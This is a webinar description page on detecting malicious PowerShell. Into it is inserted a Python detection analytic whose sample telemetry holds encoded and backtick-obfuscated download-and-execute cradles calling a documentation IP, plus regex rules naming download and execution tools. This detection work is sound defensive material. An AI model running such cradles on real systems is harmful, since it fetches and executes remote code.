The Detection Series: PowerShell

  • Published on 1 Jul 2024
  • We’re exploring one of the year’s most prevalent MITRE ATT&CK® techniques: PowerShell. Join us to learn how adversaries abuse the Windows configuration management framework and how you can observe and detect malicious and suspicious commands and behaviors.
    More often than not, T1059.001: PowerShell has been the number one ATT&CK technique in Red Canary’s annual Threat Detection Report. In the five years that we’ve been mapping threats to ATT&CK, there’s no technique we’ve detected more often.
    Download the 2023 Threat Detection Report now: redcanary.com/resources/guide...
    Installed on nearly every Windows operating system in the world, PowerShell is a versatile tool for automation and remote system management that is beloved by administrators and adversaries alike. It allows adversaries to execute commands, obfuscate malicious activity, download arbitrary binaries, gather information, change system configurations, and much more, all while blending in with routine operating system activity.
    In this highly anticipated Detection Series webinar, experts from VMware Carbon Black, MITRE ATT&CK®, and Red Canary will provide insight into:
    Common ways that adversaries abuse PowerShell
    Tools and log sources that collect relevant telemetry
    How to detect, mitigate, and respond to malicious PowerShell activity
    Strategies for testing your security controls by executing suspicious PowerShell commands with Atomic Red Team
    Attendees will leave with a better understanding of what PowerShell is and how adversaries leverage it. More importantly, practitioners will know where to find malicious activity, how to develop detection analytics for it, and how to test their detection and visibility capabilities.
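    The webinar description above lists the three things a practitioner needs for this technique: the telemetry (process command lines and, where Script Block Logging is on, the script text in Event ID 4104), a detection analytic over it, and a way to test that analytic. The following is an added example, not code from the webinar, Red Canary, or Atomic Red Team: a small Python analytic run over constructed PowerShell telemetry. The sample records, hostnames, URLs, rule weights and alert threshold are all made up for illustration; the ATT&CK IDs are the real ones for the behaviours named. It decodes -EncodedCommand payloads (base64 over UTF-16LE, not ASCII), strips backtick obfuscation before pattern matching, and scores each event so that routine administration scores low while an encoded download cradle launched from an Office parent alerts.

```python
"""Added example (not the webinar's or Red Canary's code): a minimal
T1059.001 detection analytic over constructed PowerShell telemetry."""
import base64
import re

# --- constructed sample telemetry -------------------------------------------
# Each record carries the two fields most endpoint sources give you: the
# process command line (Sysmon Event ID 1 / EDR process start) and, when
# Script Block Logging is enabled, the script text that actually ran
# (Microsoft-Windows-PowerShell/Operational Event ID 4104). Hosts, parents,
# URLs and paths are invented for this example.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage.ps1')"
# -EncodedCommand takes base64 of UTF-16LE text; computed here so it is exact.
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {  # encoded download cradle spawned by a Word document (macro-style lure)
        "host": "WS01", "parent": "WINWORD.EXE",
        "cmdline": f"powershell.exe -NoP -W Hidden -Exec Bypass -enc {ENCODED}",
        "scriptblock": ""},
    {  # backtick-obfuscated cradle, only visible through Script Block Logging
        "host": "WS02", "parent": "cmd.exe",
        "cmdline": "powershell.exe -nop",
        "scriptblock": "$w=Ne`w-Obj`ect Net.WebClient;I`EX $w.Do`wnloadString('http://198.51.100.7/b.ps1')"},
    {  # routine scheduled task: -ExecutionPolicy Bypass alone is normal admin noise
        "host": "SRV01", "parent": "svchost.exe",
        "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\Patch-Servers.ps1",
        "scriptblock": ""},
    {  # interactive admin session
        "host": "WS03", "parent": "explorer.exe",
        "cmdline": "powershell.exe",
        "scriptblock": r"Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\Temp\services.csv"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# prefixes seen most often in the wild (assumption: extend as needed).
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

# (name, ATT&CK technique, weight, pattern) evaluated over the normalised text.
RULES = [
    ("download_cradle", "T1105", 3, re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b"
        r"|Net\.WebClient|Start-BitsTransfer", re.I)),
    ("invoke_expression", "T1059.001", 2, re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("hidden_window", "T1564.003", 2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no_profile", "T1059.001", 1, re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("exec_bypass", "T1059.001", 1, re.compile(r"-ex(?:ec(?:utionpolicy)?)?\s+bypass", re.I)),
    ("char_obfuscation", "T1027", 2, re.compile(r"\[char\]\s*\d+", re.I)),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ALERT_THRESHOLD = 5  # arbitrary for the example; tune against your own baseline


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped base64 padding
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev):
    """Score one process/script-block record and list what fired."""
    findings = []
    cmdline = ev["cmdline"]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append(("encoded_command", "T1027", 3))
        # Swap the blob out so byte patterns inside base64 cannot accidentally
        # match the cradle/IEX rules; the decoded text is matched instead.
        cmdline = ENC_RE.sub("-EncodedCommand <decoded below>", cmdline)
    raw = "\n".join([cmdline, ev.get("scriptblock", ""), decoded or ""])
    # Backticks between letters are a no-op to PowerShell but defeat naive
    # string matching; count them as an indicator, then strip them.
    if raw.count("`") >= 3:
        findings.append(("backtick_obfuscation", "T1027", 2))
    text = raw.replace("`", "")
    for name, technique, weight, pattern in RULES:
        if pattern.search(text):
            findings.append((name, technique, weight))
    if ev.get("parent", "").lower() in OFFICE_PARENTS:
        findings.append(("office_parent", "T1204.002", 3))
    score = sum(w for _, _, w in findings)
    return {"host": ev["host"], "score": score, "alert": score >= ALERT_THRESHOLD,
            "findings": [n for n, _, _ in findings],
            "techniques": sorted({t for _, t, _ in findings}), "decoded": decoded}


def run(events):
    return [analyze_event(ev) for ev in events]


if __name__ == "__main__":
    for r in run(SAMPLE_EVENTS):
        flag = "ALERT" if r["alert"] else "ok   "
        print(f"{flag} {r['host']:6} score={r['score']:2} {r['findings']} {r['techniques']}")
```

    The scoring rather than single-pattern approach is deliberate: -ExecutionPolicy Bypass or -NoProfile on their own fire constantly in healthy environments, while the same flags next to a hidden window, an encoded payload and an Office parent are what the webinar's "suspicious commands and behaviors" look like in telemetry. To test the analytic the way the description suggests, feed it the command lines your Atomic Red Team T1059.001 tests actually produce and confirm each one crosses the threshold before trusting it in production.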
    Red Canary stops cyber threats no one else does, so organizations can fearlessly pursue their missions. We do it by delivering managed detection and response (MDR) across enterprise endpoints, cloud workloads, network, identities, and SaaS apps. As a security ally, we define MDR in our own terms with unlimited 24×7 support, deep threat expertise, hands-on remediation, and by doing what’s right for customers and partners.
    Subscribe to our TH-cam channel for frequently updated (though not overbearing), how-to content about Atomic Red Team, threat hunting in security operations, MDR or Managed Detection and Response, and using the MITRE ATT&CK framework.
  • Science & Technology

Comments • 1

  • @RedCanary · 11 months ago · +5

    PowerShell was the #2 threat in our 2023 Threat Detection Report. Poke around the entire report now: redcanary.com/resources/guides/threat-detection-report/?